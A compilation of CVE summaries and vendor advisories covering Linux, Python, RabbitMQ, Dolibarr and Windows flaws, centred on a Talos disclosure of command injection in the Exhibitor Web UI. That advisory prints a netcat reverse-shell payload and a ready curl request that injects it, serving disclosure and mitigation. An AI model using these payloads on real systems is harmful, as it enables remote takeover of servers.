In the Linux kernel before 5.3.9, there is a use-after-free bug that can be caused by a malicious USB device in the drivers/nfc/pn533/usb.c driver, aka CID-6af3aa57a098.

CVE-2019-19526

In the Linux kernel before 5.2.10, there is a use-after-free bug that can be caused by a malicious USB device in the drivers/hid/usbhid/hiddev.c driver, aka CID-9c09b214f30e.

CVE-2019-19527

The CGIHandler class in Python before 2.7.12 does not protect against the HTTP_PROXY variable name clash in a CGI script, which could allow a remote attacker to redirect HTTP requests.

\-------------------------------------------------------------------------------- Fedora Update Notification FEDORA-2016-970edb82d4 2016-08-23 09:31:44.260550 -------------------------------------------------------------------------------- Name : python Product : Fedora 23 Version : 2.7.11 Release : 8.fc23 URL : http://www.python.org/ Summary : An interpreted, interactive, object-oriented programming language Description : Python is an interpreted, interactive, object-oriented programming language often compared to Tcl, Perl, Scheme or Java. Python includes modules, classes, exceptions, very high level dynamic data types and dynamic typing. Python supports interfaces to many system calls and libraries, as well as to various windowing systems (X11, Motif, Tk, Mac and MFC). Programmers can write new built-in modules for Python in C or C++. Python can be used as an extension language for applications that need a programmable interface. Note that documentation for Python is provided in the python-docs package. This package provides the "python" executable; most of the actual implementation is within the "python-libs" package. -------------------------------------------------------------------------------- Update Information: Fix for CVE-2016-1000110 HTTPoxy attack -------------------------------------------------------------------------------- References: \[ 1 \] Bug #1359175 - CVE-2016-1000110 python: Python CGIHandler: sets environmental variable based on user supplied Proxy request header \[fedora-all\] https://bugzilla.redhat.com/show\_bug.cgi?id=1359175 -------------------------------------------------------------------------------- This update can be installed with the "yum" update program. Use su -c 'yum update python' at the command line. For more information, refer to "Managing Software with yum", available at https://docs.fedoraproject.org/yum/. All packages are signed with the Fedora Project GPG key. More details on the GPG keys used by the Fedora Project can be found at https://fedoraproject.org/keys --------------------------------------------------------------------------------

CVE-2016-1000110: [SECURITY] Fedora 23 Update: python-2.7.11-8.fc23 - package-announce

Pivotal RabbitMQ, 3.7 versions prior to v3.7.20 and 3.8 version prior to v3.8.1, and RabbitMQ for PCF, 1.16.x versions prior to 1.16.7 and 1.17.x versions prior to 1.17.4, contain two endpoints, federation and shovel, which do not properly sanitize user input. A remote authenticated malicious user with administrative access could craft a cross site scripting attack via the vhost or node name fields that could grant access to virtual hosts and policy management information.

All Vulnerability Reports

**CVE-2019-11291: RabbitMQ XSS attack via federation and shovel endpoints**  
**Severity**

Low

**Vendor**

Pivotal

**Description**

Pivotal RabbitMQ, 3.7 versions prior to v3.7.20 and 3.8 version prior to v3.8.1, and RabbitMQ for PCF, 1.16.x versions prior to 1.16.7 and 1.17.x versions prior to 1.17.4, contain two endpoints, federation and shovel, which do not properly sanitize user input. A remote authenticated malicious user with administrative access could craft a cross site scripting attack via the vhost or node name fields that could grant access to virtual hosts and policy management information.

**Affected VMware Products and Versions**

Severity is low unless otherwise noted.

*   RabbitMQ
    *   3.8 versions prior to v3.8.1
    *   3.7 versions prior to v3.7.20

*   RabbitMQ for Pivotal Platform
    *   1.17 versions prior to 1.17.4
    *   1.16 versions prior to 1.16.7

**Mitigation**

Users of affected versions should apply the following mitigation or upgrade. Releases that have fixed this issue include:

*   RabbitMQ
    *   v3.8.1
    *   v3.7.20

*   RabbitMQ for Pivotal Platform
    *   1.17.4
    *   1.16.7

**Credit**

This issue was responsibly reported by Markus Alvila.

**References**

*   https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11291

**History**

2019-11-22: Initial vulnerability report published.

CVE-2019-11291: CVE-2019-11291 | Security

Dolibarr ERP/CRM 3.3.1 does not properly validate user input in viewimage.php and barcode.lib.php which allows remote attackers to execute arbitrary commands.

**Name**CVE-2013-2093**Description**Dolibarr ERP/CRM 3.3.1 does not properly validate user input in viewimage.php and barcode.lib.php which allows remote attackers to execute arbitrary commands.**Source**CVE (at NVD; CERT, LWN, oss-sec, fulldisc, bugtraq, EDB, Metasploit, Red Hat, Ubuntu, Gentoo, SUSE bugzilla/CVE, Mageia, GitHub advisories/code/issues, web search, more)

The information below is based on the following data on fixed versions.

CVE-2013-2093: CVE-2013-2093

An exploitable command injection vulnerability exists in the Config editor of the Exhibitor Web UI versions 1.0.9 to 1.7.1. Arbitrary shell commands surrounded by backticks or $() can be inserted into the editor and will be executed by the Exhibitor process when it launches ZooKeeper. An attacker can execute any command as the user running the Exhibitor process.

**Summary**

An exploitable command injection vulnerability exists in the Config editor of the Exhibitor Web UI versions 1.0.9 to 1.7.1. Arbitrary shell commands surrounded by backticks or $() can be inserted into the editor and will be executed by the Exhibitor process when it launches ZooKeeper. An attacker can execute any command as the user running the Exhibitor process.

**Tested Versions**

Tested version was compiled using the standalone pom.xml from the Exhibitor master branch.

(Note that the latest released version is labeled 1.7.1, but the version in the exhibitor-standalone’s pom.xml is set to 1.6.0.)

The vulnerability should affect all versions at least as far back as 1.0.9, when the javaEnvironment variable was added.

**Product URLs**

https://github.com/soabase/exhibitor

**CVSSv3 Score**

9.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

**CWE**

CWE-78 - Improper Neutralization of Special Elements used in an OS Command

**Details**

Exhibitor is a ZooKeeper supervisory process, which is described in the ZooKeeper documentation.

Since the ZooKeeper server will exit on an error, the Apache ZooKeeper documentation suggests a supervisory process that manages the ZooKeeper server process, mainly for the purpose of restarting ZooKeeper when it exits.

Exhibitor’s Web UI does not have any form of authentication, and prior to version 1.7.0, did not have any way to specify which interfaces to listen on. Exposing Exhibitor is dangerous for the ZooKeeper ensemble because Exhibitor allows the changing of the ZooKeeper configuration, and also provides a UI for viewing and modifying keys and values stored in ZooKeeper.

By default, the Exhibitor Web UI listens on TCP 8080. However, since this port is commonly used, it may be common to find it on other ports as well.

Under the Config tab in the Exhibitor Web UI, the “java.env script” field can be modified and the new configuration pushed to ZooKeeper. Exhibitor launches ZooKeeper through a script, and the contents of this field are passed, unmodified, as arguments to the Java command to launch ZooKeeper, which can be seen here.

(The contents of the “java.env script” field are passed in as $JVMFLAGS.)

Based on how this argument is passed, there are several ways to execute arbitrary commands. The methods tested were surrounding the command with backticks and using $(), for example:

$(/bin/nc -e /bin/sh 10.0.0.64 4444 &)

This example uses netcat to open a reverse shell to a listener on 10.0.0.64:4444.

In the example, ZooKeeper will still launch successfully after the command executes, and it will run the command every time ZooKeeper is re-launched by Exhibitor.

**Exploit Proof of Concept**

The included screenshots show the process of obtaining a root shell on the system.

The steps to exploit it from a web browser:

1.  Open the Exhibitor Web UI and click on the Config tab, then flip the Editing switch to ON
2.  In the “java.env script” field, enter any command surrounded by $() or \`\`, for example, for a simple reverse shell:
    
    $(/bin/nc -e /bin/sh 10.0.0.64 4444 &)
    
3.  Click Commit > All At Once > OK
4.  The command may take up to a minute to execute.

It can also be performed with a single curl command:

command: curl -X POST -d @data.json http://10.0.0.200:8080/exhibitor/v1/config/set

data.json: { “zookeeperInstallDirectory”: “/opt/zookeeper”, “zookeeperDataDirectory”: “/opt/zookeeper/snapshots”, “zookeeperLogDirectory”: “/opt/zookeeper/transactions”, “logIndexDirectory”: “/opt/zookeeper/transactions”, “autoManageInstancesSettlingPeriodMs”: “0”, “autoManageInstancesFixedEnsembleSize”: “0”, “autoManageInstancesApplyAllAtOnce”: “1”, “observerThreshold”: “0”, “serversSpec”: “1:exhibitor-demo”, “javaEnvironment”: “$(/bin/nc -e /bin/sh 10.0.0.64 4444 &)”, “log4jProperties”: “”, “clientPort”: “2181”, “connectPort”: “2888”, “electionPort”: “3888”, “checkMs”: “30000”, “cleanupPeriodMs”: “300000”, “cleanupMaxFiles”: “20”, “backupPeriodMs”: “600000”, “backupMaxStoreMs”: “21600000”, “autoManageInstances”: “1”, “zooCfgExtra”: { “tickTime”: “2000”, “initLimit”: “10”, “syncLimit”: “5”, “quorumListenOnAllIPs”: “true” }, “backupExtra”: { “directory”: “” }, “serverId”: 1 }

**Mitigation**

Since Exhibitor has no built-in authentication, it would be helpful to limit the interfaces it listens on to only trusted networks, or require authentication using something like an nginx reverse proxy and block all other access using firewall rules.

If the features provided by the Exhibitor Web UI are not needed and the only needed functionality is managing the ZooKeeper process, it should be replaced with a simpler ZooKeeper supervisor solution, such as a systemd service.

**Timeline**

2019-03-08 - Vendor Disclosure  
2019-05-01 - GitHub issue #389 created; Vendor advised point of contact changed. Copy of report sent to new point of contact  
2019-05-14 - (75 day) 3rd follow up with vendor  
2019-05-29 - Final notice of public disclosure release  
2019-11-13 - Public Release

Discovered by Logan Sanderson of Cisco ASIG.

CVE-2019-5029: TALOS-2019-0790 || Cisco Talos Intelligence Group

An elevation of privilege vulnerability exists when the Windows Universal Plug and Play (UPnP) service improperly allows COM object creation, aka 'Windows UPnP Service Elevation of Privilege Vulnerability'.

CVE-2019-1405

An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory, aka 'Win32k Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2019-1393, CVE-2019-1394, CVE-2019-1395, CVE-2019-1396, CVE-2019-1434.

CVE-2019-1408

An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory, aka 'Win32k Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2019-1394, CVE-2019-1395, CVE-2019-1396, CVE-2019-1408, CVE-2019-1434.

CVE-2019-1393

An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory, aka 'Win32k Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2019-1393, CVE-2019-1395, CVE-2019-1396, CVE-2019-1408, CVE-2019-1434.

Tag

#perl